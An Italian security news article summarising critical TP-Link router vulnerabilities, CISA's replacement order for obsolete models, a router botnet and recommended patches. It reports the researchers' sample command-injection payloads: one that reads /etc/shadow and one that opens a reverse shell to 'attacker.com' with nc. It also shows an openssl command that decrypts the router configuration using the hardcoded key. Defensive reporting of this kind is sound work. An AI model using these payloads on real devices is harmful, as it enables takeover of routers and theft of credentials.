Vulnerabilità critiche nei router TP-Link: patch urgenti e mitigazioni consigliate
Multiple vulnerabilità con punteggi CVSS fino a 10.0 colpiscono i router TP-Link. CISA, IBM X-Force Red e Google Project Zero hanno identificato falle che cons…
Contenuto
Scopri anche
- OpenAI lancia Codex Security: validazione comportamentale invece di report SAST tradizionali
- Vulnerabilità CVE-2026-0628 in Chrome: il pannello Gemini a rischio di exploit
- Samsung rilascia One UI 8 Watch per Galaxy Watch 4 con patch correttiva dopo i problemi iniziali
- DarkSword: l'exploit kit iOS che minaccia milioni di iPhone viene reso pubblico su GitHub
- Patch Management e Vulnerability Management: differenze, integrazione e il caso NetScaler
- Cybersecurity 2025: vulnerabilità critiche sfruttate in ore, ransomware evolve e attacchi su larga scala
- DarkSword: catena di exploit sfrutta sei vulnerabilità per compromettere iPhone
- Vulnerabilità iOS: exploit Coruna e DarkSword mettono a rischio milioni di iPhone
- DarkSword, nuova catena di exploit iOS: vulnerabilità corrette da Apple
- Apple invita ad aggiornare iOS: exploit kit DarkSword e Coruna minacciano milioni di dispositivi
- Apple introduce i Background Security Improvements: aggiornamenti di sicurezza invisibili tra una versione e l'altra
- Sony rilascia il firmware 4.93 per PlayStation 3 a quasi vent'anni dal lancio
- Apple rilascia aggiornamenti di sicurezza critici per iPhone e iPad: mitigato l'exploit Coruna
- DarkSword: nuovo exploit kit iOS colpisce milioni di iPhone con catena di vulnerabilità zero-day
- Apple introduce i Background Security Improvements: il nuovo sistema di patch automatiche per iPhone, iPad e Mac
- Vulnerabilità zero-day in SharePoint e Zimbra: attacchi globali e mitigazione
- Vulnerabilità zero-day e malware colpiscono i browser Chromium: analisi delle minacce e confronto tra Chrome ed Edge
- Apple avverte gli utenti: aggiornare subito iPhone contro exploit DarkSword e Coruna
- CVE-2026-24061: la vulnerabilità che concede accesso root senza autenticazione su Telnet
- Apple introduce i Background Security Improvement: il nuovo sistema di patch leggere per iOS e macOS
Vulnerabilità critiche nei router TP-Link: patch urgenti e mitigazioni consigliate
- Quadro generale delle vulnerabilità identificate
- CVE-2025-15517: bypass dell'autorizzazione negli endpoint HTTP
- CVE-2026-15518 e CVE-2026-15519: command injection nei controlli CLI
- CVE-2025-15605: chiave hardcoded nel meccanismo di configurazione
- CVE-2024-5035: vulnerabilità critica nel router gaming Archer C5400X
- La posizione di CISA e i modelli obsoleti
- Botnet e attacchi coordinati: CovertNetwork-1658
- Protocollo TDDP e scoperte di Google Project Zero
- Misure di mitigazione e raccomandazioni operative
- Implicazioni e scenari
- Cosa monitorare
- Fonti
Vulnerabilità multiple con punteggi CVSS elevati colpiscono diversi modelli di router TP-Link, esponendo reti domestiche e aziendali a rischi significativi. Le falle, alcune classificate come zero-day, consentono agli attaccanti di eseguire comandi non autorizzati, bypassare meccanismi di autenticazione e assumere il controllo completo dei dispositivi. TP-Link ha rilasciato patch specifiche per i modelli interessati, mentre l'agenzia governativa statunitense CISA ha emanato direttive per la dismissione di dispositivi obsoleti entro luglio 2025.
Quadro generale delle vulnerabilità identificate
⬆ Torna suLe analisi condotte da ricercatori di sicurezza, tra cui IBM X-Force Red e Google Project Zero, hanno portato alla luce una serie di vulnerabilità che interessano i router TP-Link. Le falle sono state classificate con punteggi CVSS compresi tra 8.5 e 10.0, indicando un livello di pericolosità elevato. Le problematiche riguardano l'interfaccia web di gestione, protocolli di debug e meccanismi di autenticazione. I modelli colpiti includono le serie Archer NX (NX200, NX210, NX500, NX600), Archer C5 V4, MR200v4, MR6400v4, MR400v3, Archer C5400X, oltre ai dispositivi datati TL-WR940N, TL-WR841N e TL-WR740N.
TP-Link ha reso pubblici gli advisories di sicurezza e ha reso disponibili le patch correttive sul portale ufficiale di supporto. Tuttavia, alcuni modelli non ricevono più aggiornamenti firmware da diversi anni, rendendo necessaria la sostituzione dei dispositivi. I ricercatori sottolineano che queste vulnerabilità non sono teoriche: esistono dimostrazioni pratiche di attacco che rendono lo sfruttamento accessibile anche ad attaccanti con competenze limitate.
CVE-2025-15517: bypass dell'autorizzazione negli endpoint HTTP
⬆ Torna suLa vulnerabilità CVE-2025-15517, con punteggio CVSS 8.6, interessa gli endpoint del server HTTP nei router Archer NX. La falla consente a utenti non autenticati di accedere a endpoint sensibili come /upload_firmware e /config_alter, sfruttando l'assenza di validazione dei token. Gli attaccanti possono quindi caricare firmware malevolo o alterare le configurazioni del dispositivo senza credenziali valide.
La mitigazione implementata da TP-Link consiste nel rinforzo delle Access Control Lists (ACL) nelle versioni correttive del firmware. Gli utenti che non applicano la patch espongono la propria rete a hijacking, modifiche non autorizzate delle configurazioni DNS e potenziale intercettazione del traffico di rete.
CVE-2026-15518 e CVE-2026-15519: command injection nei controlli CLI
⬆ Torna suLe vulnerabilità CVE-2026-15518 e CVE-2026-15519, entrambe con CVSS 8.5, riguardano l'iniezione di comandi rispettivamente nel controllo wireless CLI e nel modulo di gestione modem. I parametri di input non vengono sanificati prima di essere passati alla shell del sistema operativo, consentendo l'esecuzione di comandi arbitrari con privilegi di root.
Un esempio di payload dimostrativo riportato dai ricercatori include: iwpriv wlan0 set_MIB mbss_num=1; cat /etc/shadow. Nel caso della gestione modem, un proof-of-concept manipola il comando modemctl con costrutti come && nc attacker.com 4444 -e /bin/sh. Le falle derivano dall'utilizzo di funzioni come strcpy senza verifica dei limiti, residui di codice legacy nel firmware.
CVE-2025-15605: chiave hardcoded nel meccanismo di configurazione
⬆ Torna suLa vulnerabilità CVE-2025-15605, anch'essa con CVSS 8.5, riguarda la presenza di una chiave statica nel meccanismo di configurazione. La chiave, derivata tramite algoritmo MD5, consente la decrittografia, modifica e ricrittografia del file di configurazione /etc/config. Un attaccante può quindi estrarre credenziali e parametri sensibili utilizzando strumenti come OpenSSL con la chiave hardcoded.
L'esempio fornito dalla documentazione tecnica mostra il comando: openssl enc -d -aes-256-cbc -k hardcodedkey -in config.bin -out plain.txt. Questo tipo di falla compromette la confidenzialità, l'integrità e la disponibilità del dispositivo, aprendo la strada a persistenza tramite cron job o script init.d.
CVE-2024-5035: vulnerabilità critica nel router gaming Archer C5400X
⬆ Torna suIl router TP-Link Archer C5400X, progettato per il gaming, è interessato dalla vulnerabilità CVE-2024-5035 classificata con il punteggio CVSS massimo di 10.0. La falla risiede nel binario rftest, relativo ai test di radiofrequenza, che attiva un listener di rete sulle porte TCP 8888, 8889 e 8890. Un attaccante remoto non autenticato può eseguire codice sul dispositivo con privilegi elevati.
Le restrizioni progettate per accettare solo comandi specifici risultano facilmente aggirabili mediante l'inserimento di comandi non autorizzati contenenti caratteri speciali. TP-Link ha rilasciato la correzione nella versione firmware 1_1.1.7, che elimina la possibilità di eseguire comandi con caratteri speciali. Tutte le versioni firmware precedenti alla 1_1.1.6 sono vulnerabili.
La posizione di CISA e i modelli obsoleti
⬆ Torna suL'agenzia governativa americana CISA ha segnalato una falla critica identificata due anni fa ma ancora sfruttabile, che coinvolge modelli di router non più supportati. Il TL-WR940N non riceve aggiornamenti dal 2016, il TL-WR841N è privo di supporto dal 2015 nonostante oltre 77.000 recensioni su Amazon, mentre il TL-WR740N ha l'ultimo aggiornamento risalente a 15 anni fa. La vulnerabilità, con punteggio CVSS 8.8, permette l'iniezione di comandi tramite un parametro non validato nelle richieste GET all'interfaccia web di gestione.
CISA ha obbligato le agenzie federali statunitensi a dismettere questi dispositivi entro luglio 2025. L'agenzia raccomanda a tutte le organizzazioni e ai privati di sostituire immediatamente i modelli obsoleti con dispositivi più moderni e sicuri. La diffusione online di dimostrazioni pratiche di attacco rende lo sfruttamento accessibile anche a malintenzionati con competenze tecniche limitate.
Botnet e attacchi coordinati: CovertNetwork-1658
⬆ Torna suMicrosoft ha individuato una rete di router Small Office/Home Office (SOHO) compromessi, denominata CovertNetwork-1658 e nota anche come botnet Quad 7 (7777). Questa rete è stata utilizzata da autori di minacce cinesi per condurre attacchi password spray contro account Microsoft 365. Gli attaccanti sfruttano le vulnerabilità dei router per ottenere capacità di esecuzione di codice remoto.
I modelli coinvolti in questa campagna includono Archer C7 e TL-WR841N/ND. TP-Link ha precisato che l'interfaccia di amministrazione remota su Internet non viene attivata di default dal firmware, ma richiede attivazione manuale da parte dell'utente. L'azienda sconsiglia di esporre tale interfaccia su Internet come misura precauzionale fino alla risoluzione delle vulnerabilità.
Protocollo TDDP e scoperte di Google Project Zero
⬆ Torna suIl team Project Zero di Google ha reso nota una falla nei router TP-Link Archer legata al protocollo TDDP (TP-Link Device Debug Protocol). Il protocollo invia due tipi di comandi al dispositivo: uno di questi non richiede autenticazione come amministratore e consente di inviare richieste tramite il Trivial File Transfer Protocol (TFTP), elaborate da un interpreter con privilegi di root. Questo permette di inviare qualsiasi tipo di comando al sistema, assumendo il controllo completo del dispositivo.
Il team IBM X-Force Red ha confermato che il bug del firmware interessava sia i router domestici che aziendali. Per sfruttare la vulnerabilità, un utente malintenzionato potrebbe inviare una richiesta HTTP includendo una stringa di caratteri più lunga del numero consentito, rendendo nulla la password dell'utente. I ricercatori hanno potuto accedere a TFTP e TELNET con il solo nome utente "admin" senza alcuna password.
Misure di mitigazione e raccomandazioni operative
⬆ Torna suTP-Link ha rilasciato patch specifiche per ogni versione hardware dei modelli interessati. Gli utenti devono verificare la versione hardware riportata sull'etichetta del router e scaricare l'aggiornamento corrispondente dal portale ufficiale di supporto. Per i dispositivi obsoleti non più supportati, la soluzione consiste nella sostituzione con modelli più recenti.
Il vademecum pubblicato dal team Malwarebytes include quattro passaggi fondamentali: aggiornare il firmware alla versione più recente disponibile; se il supporto non è più disponibile, sostituire il router; disattivare tutte le funzioni di gestione remota; modificare le password di amministrazione evitando di riutilizzare quelle obsolete. In contesti aziendali, l'integrazione con sistemi NAC (Network Access Control) consente la quarantena automatica dei dispositivi compromessi.
Per l'hardening avanzato, i ricercatori suggeriscono la compilazione di firmware personalizzati con OpenWRT, disabilitando servizi non necessari come telnet e SSH. Le patch firmware utilizzano delta-patching per ridurre il downtime, ma richiedono la verifica degli hash SHA256 per garantire l'integrità. Gli esperti consigliano di effettuare audit dei log e simulazioni di attacco per validare l'efficacia delle patch applicate.
Questo articolo è una sintesi basata esclusivamente sulle fonti elencate.
Implicazioni e scenari
⬆ Torna suLe vulnerabilità identificate nei router TP-Link potrebbero avere ripercussioni significative sulla sicurezza di reti domestiche e aziendali, considerando la diffusione dei modelli interessati e la disponibilità di proof-of-concept pubblici.
- Scenario 1: Le organizzazioni che ritardano l'applicazione delle patch espongono le infrastrutture a rischio di compromissione tramite le falle nei modelli Archer NX e C5400X.
- Scenario 2: La dismissione dei dispositivi obsoleti entro luglio 2025 potrebbe generare costi di sostituzione e sfide operative per chi utilizza ancora TL-WR940N e TL-WR841N.
- Scenario 3: La botnet CovertNetwork-1658 potrebbe espandersi sfruttando router non aggiornati come punti di accesso per attacchi coordinati.
Cosa monitorare
⬆ Torna su- L'adozione delle patch e la risposta degli utenti ai consigli di CISA.
- Eventuali segnalazioni di sfruttamento attivo delle CVE identificate.
- L'evoluzione delle campagne legate alla botnet Quad 7.
Nota editoriale: questa sezione propone una lettura analitica dei temi trattati, senza introdurre dati fattuali non presenti nelle fonti.
Fonti
⬆ Torna su- https://prothect.it/sicurezza/vulnerabilita-multiple-nei-router-tp-link-archer-come-proteggerli-subito/
- https://www.ilgiornale.it/news/hardware-e-software/router-tp-link-colpiti-dagli-hacker-lallarme-lanciato-2533527.html
- https://www.html.it/magazine/cisa-avverte-vulnerabilita-critiche-in-alcuni-tra-i-router-tp-link-piu-diffusi-fai-attenzione-potresti-averne-uno/
- https://sicurezza.net/cyber-security/vulnerabilita-router-tp-link-pericolo-imminente/
- https://www.securityopenlab.it/news/683/telecamere-tp-link-vulnerabili-ai-cyber-attacchi.html
- https://hackerjournal.it/4963/scoperta-vulnerabilita-zero-day-nei-router-tp-link/
- https://www.cybertrends.it/vulnerabilita-zero-day-nei-router-tp-link/
In breve
- vulnerabilita
- cve
- patch
- zero-day